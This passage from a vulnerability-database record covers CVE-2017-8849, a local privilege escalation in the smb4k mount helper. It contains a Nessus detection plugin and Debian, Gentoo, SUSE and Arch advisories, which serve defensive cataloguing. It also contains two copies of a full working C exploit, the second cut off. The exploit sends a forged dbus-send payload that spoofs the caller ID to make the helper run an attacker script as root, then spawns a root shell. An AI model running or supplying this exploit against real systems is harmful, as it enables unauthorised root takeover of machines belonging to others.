has a local root exploit issue\n (boo#1036245, CVE-2017-8849). Automatic mounting will no\n longer be possible to work around this security issue.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-19T00:00:00", "title": "openSUSE Security Update : smb4k (openSUSE-2017-595)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "modified": "2017-05-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:smb4k-debugsource", "p-cpe:/a:novell:opensuse:smb4k", "p-cpe:/a:novell:opensuse:smb4k-lang", "p-cpe:/a:novell:opensuse:smb4k-debuginfo", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2017-595.NASL", "href": "https://www.tenable.com/plugins/nessus/100286", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-595.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100286);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-8849\");\n\n script_name(english:\"openSUSE Security Update : smb4k (openSUSE-2017-595)\");\n script_summary(english:\"Check for the openSUSE-2017-595 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for smb4k fixes the following issues :\n\n - Disabled dbus service and polkit rules, because this\n version of smb4k has a local root exploit issue\n (boo#1036245, CVE-2017-8849). 
Automatic mounting will no\n longer be possible to work around this security issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1036245\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected smb4k packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:smb4k\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:smb4k-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:smb4k-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:smb4k-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"smb4k-1.2.1-3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"smb4k-debuginfo-1.2.1-3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"smb4k-debugsource-1.2.1-3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"smb4k-lang-1.2.1-3.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"smb4k / smb4k-debuginfo / smb4k-debugsource / smb4k-lang\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:21:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8849"], "description": "Package : smb4k\nVersion : 1.2.1-2~deb7u1\nCVE ID : CVE-2017-8849\nDebian Bug : 862505\n\nSebastian Krahmer from SUSE discovered that smb4k, a Samba (SMB) share\nadvanced 
browser, contains a logic flaw in which the mount helper binary\ndoes not properly verify the mount command it is being asked to run.\n\nThis allows local users to call any other binary as root.\n\nThe issue is resolved by backporting version 1.2.1-2 from Debian 9\n\"Stretch\".\n\nFor Debian 7 \"Wheezy\", these problems have been fixed in version\n1.2.1-2~deb7u1.\n\nWe recommend that you upgrade your smb4k packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 2, "modified": "2017-06-25T22:41:59", "published": "2017-06-25T22:41:59", "id": "DEBIAN:DLA-1002-1:1EBFE", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201706/msg00031.html", "title": "[SECURITY] [DLA 1002-1] smb4k security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:53", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8849"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3951-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nAugust 22, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : smb4k\nCVE ID : CVE-2017-8849\n\nSebastian Krahmer discovered that a programming error in the mount\nhelper binary of the Smb4k Samba network share browser may result in\nlocal privilege escalation.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 1.2.1-2~deb8u1.\n\nWe recommend that you upgrade your smb4k packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", 
"edition": 2, "modified": "2017-08-22T21:30:16", "published": "2017-08-22T21:30:16", "id": "DEBIAN:DSA-3951-1:6632E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00213.html", "title": "[SECURITY] [DSA 3951-1] smb4k security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2017-05-28T22:26:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8849"], "description": "### Background\n\nSmb4K is a SMB/CIFS (Windows) share browser for KDE.\n\n### Description\n\nSmb4k contains a logic flaw in which mount helper binary does not properly verify the mount command it is being asked to run. \n\n### Impact\n\nA local user can execute commands with the root privilege due to the mount helper being installed as suid. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Smb4K users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/smb4k-1.2.3-r1:4\"", "edition": 1, "modified": "2017-05-26T00:00:00", "published": "2017-05-26T00:00:00", "href": "https://security.gentoo.org/glsa/201705-14", "id": "GLSA-201705-14", "title": "Smb4K: Arbitrary command execution as root", "type": "gentoo", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2017-05-18T19:20:41", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8849"], "description": "This update for smb4k fixes the following issues:\n\n - Disabled dbus service and polkit rules, because this version of smb4k\n has a local root exploit issue (boo#1036245, CVE-2017-8849). 
Automatic\n mounting will no longer be possible to work around this security issue.\n\n", "edition": 1, "modified": "2017-05-18T21:11:51", "published": "2017-05-18T21:11:51", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00057.html", "id": "OPENSUSE-SU-2017:1343-1", "title": "Security update for smb4k (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8849"], "description": "Arch Linux Security Advisory ASA-201705-11\n==========================================\n\nSeverity: High\nDate : 2017-05-10\nCVE-ID : CVE-2017-8849\nPackage : smb4k\nType : privilege escalation\nRemote : No\nLink : https://security.archlinux.org/AVG-268\n\nSummary\n=======\n\nThe package smb4k before version 2.0.0-2 is vulnerable to privilege\nescalation.\n\nResolution\n==========\n\nUpgrade to 2.0.0-2.\n\n# pacman -Syu \"smb4k>=2.0.0-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nSmb4k <= 2.0.0 contains a logic flaw in which mount helper binary does\nnot properly verify the mount command it is being asked to run. 
This\nallows calling any other binary as root since the mount helper is\ntypically installed as suid.\n\nImpact\n======\n\nA local, unprivileged attacker can escalate privileges to become root\non the affected host.\n\nReferences\n==========\n\nhttps://www.kde.org/info/security/advisory-20170510-2.txt\nhttp://seclists.org/oss-sec/2017/q2/240\nhttps://commits.kde.org/smb4k/a90289b0962663bc1d247bbbd31b9e65b2ca000e\nhttps://security.archlinux.org/CVE-2017-8849", "modified": "2017-05-10T00:00:00", "published": "2017-05-10T00:00:00", "id": "ASA-201705-11", "href": "https://security.archlinux.org/ASA-201705-11", "type": "archlinux", "title": "[ASA-201705-11] smb4k: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-10T04:22:50", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2017-05-23T00:00:00", "type": "zdt", "title": "KDE 4/5 - KAuth Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8422", "CVE-2017-8849"], "modified": "2017-05-23T00:00:00", "href": "https://0day.today/exploit/description/27821", "id": "1337DAY-ID-27821", "sourceData": "// cc -Wall smb0k.c -pedantic -std=c11\r\n//\r\n// smb4k PoC, also demonstrating broader scope of a generic kde\r\n// authentication bypass vulnerability\r\n//\r\n// (C) 2017 Sebastian Krahmer\r\n//\r\n \r\n#define _POSIX_C_SOURCE 200112L\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/stat.h>\r\n \r\n \r\nvoid die(const char *s)\r\n{\r\n perror(s);\r\n exit(errno);\r\n}\r\n \r\n \r\nint main(int argc, char **argv)\r\n{\r\n char me[1024] = {0};\r\n char *dbus[] = {\r\n \"/usr/bin/dbus-send\",\r\n \"--system\",\r\n \"--print-reply\",\r\n \"--dest=net.sourceforge.smb4k.mounthelper\",\r\n \"/\",\r\n \"org.kde.auth.performActions\",\r\n 
\"array:byte:\"\r\n// The variant map, containing evil mh_command key-pair\r\n\"0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x4e,0x00,0x6e,0x00,0x65,0x00,0x74,\"\r\n\"0x00,0x2e,0x00,0x73,0x00,0x6f,0x00,0x75,0x00,0x72,0x00,0x63,0x00,0x65,\"\r\n\"0x00,0x66,0x00,0x6f,0x00,0x72,0x00,0x67,0x00,0x65,0x00,0x2e,0x00,0x73,\"\r\n\"0x00,0x6d,0x00,0x62,0x00,0x34,0x00,0x6b,0x00,0x2e,0x00,0x6d,0x00,0x6f,\"\r\n\"0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x68,0x00,0x65,0x00,0x6c,0x00,0x70,\"\r\n\"0x00,0x65,0x00,0x72,0x00,0x2e,0x00,0x6d,0x00,0x6f,0x00,0x75,0x00,0x6e,\"\r\n\"0x00,0x74,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x18,0x00,0x6d,0x00,0x68,\"\r\n\"0x00,0x5f,0x00,0x77,0x00,0x6f,0x00,0x72,0x00,0x6b,0x00,0x67,0x00,0x72,\"\r\n\"0x00,0x6f,0x00,0x75,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,\"\r\n\"0x00,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x75,0x00,\"\r\n\"0x72,0x00,0x6c,0x00,0x00,0x00,0x11,0x00,0x00,0x00,0x00,0x24,0x73,0x6d,\"\r\n\"0x62,0x3a,0x2f,0x2f,0x61,0x62,0x63,0x3a,0x31,0x32,0x33,0x34,0x35,0x36,\"\r\n\"0x40,0x31,0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x3a,0x34,0x34,0x35,\"\r\n\"0x2f,0x73,0x68,0x61,0x72,0x65,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,\"\r\n\"0x00,0x5f,0x00,0x75,0x00,0x6e,0x00,0x63,0x00,0x00,0x00,0x0a,0x00,0x00,\"\r\n\"0x00,0x00,0x22,0x00,0x2f,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,\"\r\n\"0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,\"\r\n\"0x73,0x00,0x68,0x00,0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x14,0x00,\"\r\n\"0x6d,0x00,0x68,0x00,0x5f,0x00,0x6f,0x00,0x70,0x00,0x74,0x00,0x69,0x00,\"\r\n\"0x6f,0x00,0x6e,0x00,0x73,0x00,0x00,0x00,0x0b,0x00,0x00,0x00,0x00,0x02,\"\r\n\"0x00,0x00,0x00,0x04,0x00,0x2d,0x00,0x6f,0x00,0x00,0x01,0x1c,0x00,0x75,\"\r\n\"0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,\"\r\n\"0x00,0x3d,0x00,0x6a,0x00,0x6f,0x00,0x65,0x00,0x2c,0x00,0x75,0x00,0x69,\"\r\n\"0x00,0x64,0x00,0x3d,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x2c,\"\r\n\"0x00,0x67,0x00,0x69,0x00,0x64,0x00,0x3d,0x00,0x3
1,0x00,0x30,0x00,0x30,\"\r\n\"0x00,0x2c,0x00,0x70,0x00,0x6f,0x00,0x72,0x00,0x74,0x00,0x3d,0x00,0x34,\"\r\n\"0x00,0x34,0x00,0x35,0x00,0x2c,0x00,0x72,0x00,0x77,0x00,0x2c,0x00,0x66,\"\r\n\"0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,\"\r\n\"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,\"\r\n\"0x00,0x64,0x00,0x69,0x00,0x72,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,\"\r\n\"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,\"\r\n\"0x00,0x70,0x00,0x65,0x00,0x72,0x00,0x6d,0x00,0x2c,0x00,0x6e,0x00,0x6f,\"\r\n\"0x00,0x73,0x00,0x65,0x00,0x74,0x00,0x75,0x00,0x69,0x00,0x64,0x00,0x73,\"\r\n\"0x00,0x2c,0x00,0x6e,0x00,0x6f,0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x76,\"\r\n\"0x00,0x65,0x00,0x72,0x00,0x69,0x00,0x6e,0x00,0x6f,0x00,0x2c,0x00,0x63,\"\r\n\"0x00,0x61,0x00,0x63,0x00,0x68,0x00,0x65,0x00,0x3d,0x00,0x73,0x00,0x74,\"\r\n\"0x00,0x72,0x00,0x69,0x00,0x63,0x00,0x74,0x00,0x2c,0x00,0x6e,0x00,0x6f,\"\r\n\"0x00,0x6d,0x00,0x61,0x00,0x70,0x00,0x63,0x00,0x68,0x00,0x61,0x00,0x72,\"\r\n\"0x00,0x73,0x00,0x2c,0x00,0x73,0x00,0x65,0x00,0x63,0x00,0x3d,0x00,0x6e,\"\r\n\"0x00,0x74,0x00,0x6c,0x00,0x6d,0x00,0x73,0x00,0x73,0x00,0x70,0x00,0x2c,\"\r\n\"0x00,0x76,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x3d,0x00,0x31,0x00,0x2e,\"\r\n\"0x00,0x30,0x00,0x00,0x00,0x1a,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x6d,\"\r\n\"0x00,0x6f,0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x70,0x00,0x6f,0x00,0x69,\"\r\n\"0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x3e,0x00,\"\r\n\"0x2f,0x00,0x68,0x00,0x6f,0x00,0x6d,0x00,0x65,0x00,0x2f,0x00,0x6a,0x00,\"\r\n\"0x6f,0x00,0x65,0x00,0x2f,0x00,0x73,0x00,0x6d,0x00,0x62,0x00,0x34,0x00,\"\r\n\"0x6b,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,0x2e,0x00,0x30,0x00,\"\r\n\"0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,0x73,0x00,0x68,0x00,\"\r\n\"0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x0a,0x00,0x6d,0x00,0x68,0x00,\"\r\n\"0x5f,0x00,0x69,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0xff,0xff,0xff,0xff,\"\r\n\"0x00,0x00,0x00,0x14,
0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x63,0x00,0x6f,\"\r\n\"0x00,0x6d,0x00,0x6d,0x00,0x65,0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,\"\r\n\"0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,\"\r\n\"0x5f,0x00,0x63,0x00,0x6f,0x00,0x6d,0x00,0x6d,0x00,0x61,0x00,0x6e,0x00,\"\r\n\"0x64,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x20,0x00,0x2f,0x00,0x74,\"\r\n\"0x00,0x6d,0x00,0x70,0x00,0x2f,0x00,0x78,0x00,0x6d,0x00,0x6f,0x00,0x75,\"\r\n\"0x00,0x6e,0x00,0x74,0x00,0x2e,0x00,0x63,0x00,0x69,0x00,0x66,0x00,0x73\",\r\n \r\n// the callerID, \":1.0\" which is dbus itself and thus always passes\r\n\"array:byte:58,49,46,48\", NULL};\r\n \r\n char *boomsh = \"/tmp/xmount.cifs\";\r\n char *const sh[] = {me, \"shell\", NULL};\r\n char *const bash[] = {\"/bin/bash\", \"--norc\", \"--noprofile\", NULL};\r\n struct stat st;\r\n int fd = -1;\r\n \r\n if (readlink(\"/proc/self/exe\", me, sizeof(me) - 1) < 0)\r\n die(\"[-] readlink\");\r\n \r\n if (geteuid() == 0) {\r\n setuid(0);\r\n setgid(0);\r\n if (argc == 2) {\r\n execve(*bash, bash, NULL);\r\n die(\"[-] execve of bash\");\r\n }\r\n chown(me, 0, 0);\r\n chmod(me, 04755);\r\n exit(0);\r\n }\r\n \r\n printf(\"[*] Creating shellscript ...\\n\");\r\n unlink(boomsh);\r\n if ((fd = open(boomsh, O_RDWR|O_CREAT, 0755)) < 0)\r\n die(\"[-] open\");\r\n write(fd, \"#!/bin/sh\\n\", 10);\r\n write(fd, me, strlen(me));\r\n write(fd, \"\\n\", 1);\r\n close(fd);\r\n \r\n printf(\"[*] Triggering call...\\n\");\r\n \r\n if (fork() == 0) {\r\n execve(*dbus, dbus, NULL);\r\n exit(1);\r\n }\r\n wait(NULL);\r\n sleep(5);\r\n printf(\"[*] Trying to find rootshell...\\n\");\r\n \r\n memset(&st, 0, sizeof(st));\r\n stat(me, &st);\r\n if ((st.st_mode & 04000) != 04000)\r\n die(\"[-] Failed to chmod ourselfs.\\n\");\r\n \r\n execve(me, sh, NULL);\r\n return 0;\r\n}\n\n# 0day.today [2018-04-10] #", "sourceHref": "https://0day.today/exploit/27821", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], 
"exploitdb": [{"lastseen": "2017-05-25T20:39:42", "description": "KDE 4/5 - 'KAuth' Privilege Escalation. CVE-2017-8422,CVE-2017-8849. Local exploit for Linux platform", "published": "2017-05-18T00:00:00", "type": "exploitdb", "title": "KDE 4/5 - 'KAuth' Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8422", "CVE-2017-8849"], "modified": "2017-05-18T00:00:00", "id": "EDB-ID:42053", "href": "https://www.exploit-db.com/exploits/42053/", "sourceData": "// cc -Wall smb0k.c -pedantic -std=c11\r\n//\r\n// smb4k PoC, also demonstrating broader scope of a generic kde\r\n// authentication bypass vulnerability\r\n//\r\n// (C) 2017 Sebastian Krahmer\r\n//\r\n\r\n#define _POSIX_C_SOURCE 200112L\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/stat.h>\r\n\r\n\r\nvoid die(const char *s)\r\n{\r\n\tperror(s);\r\n\texit(errno);\r\n}\r\n\r\n\r\nint main(int argc, char **argv)\r\n{\r\n\tchar me[1024] = {0};\r\n\tchar *dbus[] = {\r\n\t\t\"/usr/bin/dbus-send\",\r\n\t\t\"--system\",\r\n\t\t\"--print-reply\",\r\n\t\t\"--dest=net.sourceforge.smb4k.mounthelper\",\r\n\t\t\"/\",\r\n\t\t\"org.kde.auth.performActions\",\r\n\t\t\"array:byte:\"\r\n// The variant map, containing evil mh_command 
key-pair\r\n\"0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x4e,0x00,0x6e,0x00,0x65,0x00,0x74,\"\r\n\"0x00,0x2e,0x00,0x73,0x00,0x6f,0x00,0x75,0x00,0x72,0x00,0x63,0x00,0x65,\"\r\n\"0x00,0x66,0x00,0x6f,0x00,0x72,0x00,0x67,0x00,0x65,0x00,0x2e,0x00,0x73,\"\r\n\"0x00,0x6d,0x00,0x62,0x00,0x34,0x00,0x6b,0x00,0x2e,0x00,0x6d,0x00,0x6f,\"\r\n\"0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x68,0x00,0x65,0x00,0x6c,0x00,0x70,\"\r\n\"0x00,0x65,0x00,0x72,0x00,0x2e,0x00,0x6d,0x00,0x6f,0x00,0x75,0x00,0x6e,\"\r\n\"0x00,0x74,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x18,0x00,0x6d,0x00,0x68,\"\r\n\"0x00,0x5f,0x00,0x77,0x00,0x6f,0x00,0x72,0x00,0x6b,0x00,0x67,0x00,0x72,\"\r\n\"0x00,0x6f,0x00,0x75,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,\"\r\n\"0x00,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x75,0x00,\"\r\n\"0x72,0x00,0x6c,0x00,0x00,0x00,0x11,0x00,0x00,0x00,0x00,0x24,0x73,0x6d,\"\r\n\"0x62,0x3a,0x2f,0x2f,0x61,0x62,0x63,0x3a,0x31,0x32,0x33,0x34,0x35,0x36,\"\r\n\"0x40,0x31,0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x3a,0x34,0x34,0x35,\"\r\n\"0x2f,0x73,0x68,0x61,0x72,0x65,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,\"\r\n\"0x00,0x5f,0x00,0x75,0x00,0x6e,0x00,0x63,0x00,0x00,0x00,0x0a,0x00,0x00,\"\r\n\"0x00,0x00,0x22,0x00,0x2f,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,\"\r\n\"0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,\"\r\n\"0x73,0x00,0x68,0x00,0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x14,0x00,\"\r\n\"0x6d,0x00,0x68,0x00,0x5f,0x00,0x6f,0x00,0x70,0x00,0x74,0x00,0x69,0x00,\"\r\n\"0x6f,0x00,0x6e,0x00,0x73,0x00,0x00,0x00,0x0b,0x00,0x00,0x00,0x00,0x02,\"\r\n\"0x00,0x00,0x00,0x04,0x00,0x2d,0x00,0x6f,0x00,0x00,0x01,0x1c,0x00,0x75,\"\r\n\"0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,\"\r\n\"0x00,0x3d,0x00,0x6a,0x00,0x6f,0x00,0x65,0x00,0x2c,0x00,0x75,0x00,0x69,\"\r\n\"0x00,0x64,0x00,0x3d,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x2c,\"\r\n\"0x00,0x67,0x00,0x69,0x00,0x64,0x00,0x3d,0x00,0x31,0x00,0x30,0x00,0x30,\"\r\n\"0x00,0x2c,0x00,0x70,0x00,0x6f,0x00,0
x72,0x00,0x74,0x00,0x3d,0x00,0x34,\"\r\n\"0x00,0x34,0x00,0x35,0x00,0x2c,0x00,0x72,0x00,0x77,0x00,0x2c,0x00,0x66,\"\r\n\"0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,\"\r\n\"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,\"\r\n\"0x00,0x64,0x00,0x69,0x00,0x72,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,\"\r\n\"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,\"\r\n\"0x00,0x70,0x00,0x65,0x00,0x72,0x00,0x6d,0x00,0x2c,0x00,0x6e,0x00,0x6f,\"\r\n\"0x00,0x73,0x00,0x65,0x00,0x74,0x00,0x75,0x00,0x69,0x00,0x64,0x00,0x73,\"\r\n\"0x00,0x2c,0x00,0x6e,0x00,0x6f,0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x76,\"\r\n\"0x00,0x65,0x00,0x72,0x00,0x69,0x00,0x6e,0x00,0x6f,0x00,0x2c,0x00,0x63,\"\r\n\"0x00,0x61,0x00,0x63,0x00,0x68,0x00,0x65,0x00,0x3d,0x00,0x73,0x00,0x74,\"\r\n\"0x00,0x72,0x00,0x69,0x00,0x63,0x00,0x74,0x00,0x2c,0x00,0x6e,0x00,0x6f,\"\r\n\"0x00,0x6d,0x00,0x61,0x00,0x70,0x00,0x63,0x00,0x68,0x00,0x61,0x00,0x72,\"\r\n\"0x00,0x73,0x00,0x2c,0x00,0x73,0x00,0x65,0x00,0x63,0x00,0x3d,0x00,0x6e,\"\r\n\"0x00,0x74,0x00,0x6c,0x00,0x6d,0x00,0x73,0x00,0x73,0x00,0x70,0x00,0x2c,\"\r\n\"0x00,0x76,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x3d,0x00,0x31,0x00,0x2e,\"\r\n\"0x00,0x30,0x00,0x00,0x00,0x1a,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x6d,\"\r\n\"0x00,0x6f,0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x70,0x00,0x6f,0x00,0x69,\"\r\n\"0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x3e,0x00,\"\r\n\"0x2f,0x00,0x68,0x00,0x6f,0x00,0x6d,0x00,0x65,0x00,0x2f,0x00,0x6a,0x00,\"\r\n\"0x6f,0x00,0x65,0x00,0x2f,0x00,0x73,0x00,0x6d,0x00,0x62,0x00,0x34,0x00,\"\r\n\"0x6b,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,0x2e,0x00,0x30,0x00,\"\r\n\"0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,0x73,0x00,0x68,0x00,\"\r\n\"0x61,0x00,0x72,0x00,0x65,0